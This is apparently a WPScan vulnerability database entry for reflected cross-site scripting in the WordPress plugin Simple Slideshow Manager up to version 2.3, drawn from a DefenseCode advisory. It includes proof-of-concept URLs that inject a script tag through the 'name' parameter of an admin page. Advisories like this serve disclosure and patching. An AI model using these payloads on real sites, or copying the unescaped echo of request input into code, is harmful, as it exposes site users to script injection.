Simple Slideshow Manager <= 2.3 – Multiple Vulnerabilities

Proof of Concept
3.1 Cross-Site Scripting
Vulnerable Function: echo
Vulnerable Variable: $_GET['name']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=Acurax-Slideshow-AddImages&name="></script><script>alert(42)</script>

3.2 Cross-Site Scripting
Vulnerable Function: echo
Vulnerable Variable: $_SERVER['REQUEST_URI']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=Acurax-Slideshow-AddImages&name="></script><script>alert(42)</script>

Affects Plugin

Fixed in version 2.3.1

References

URL http://defensecode.com/advisories/DC-2017-02-016_WordPress_Simple_Slideshow_Manager_Plugin_Advisory.pdf

Classification

Type MULTI

Miscellaneous

Submitter Neven Biruski
Submitter Website http://www.defensecode.com
Submitter Twitter DefenseCode
Views 100
Verified No
WPVDB ID 8841

Timeline

Publicly Published 2017-05-31 (5 months ago)
Added 2017-06-01 (5 months ago)
Last Updated 2017-06-01 (5 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.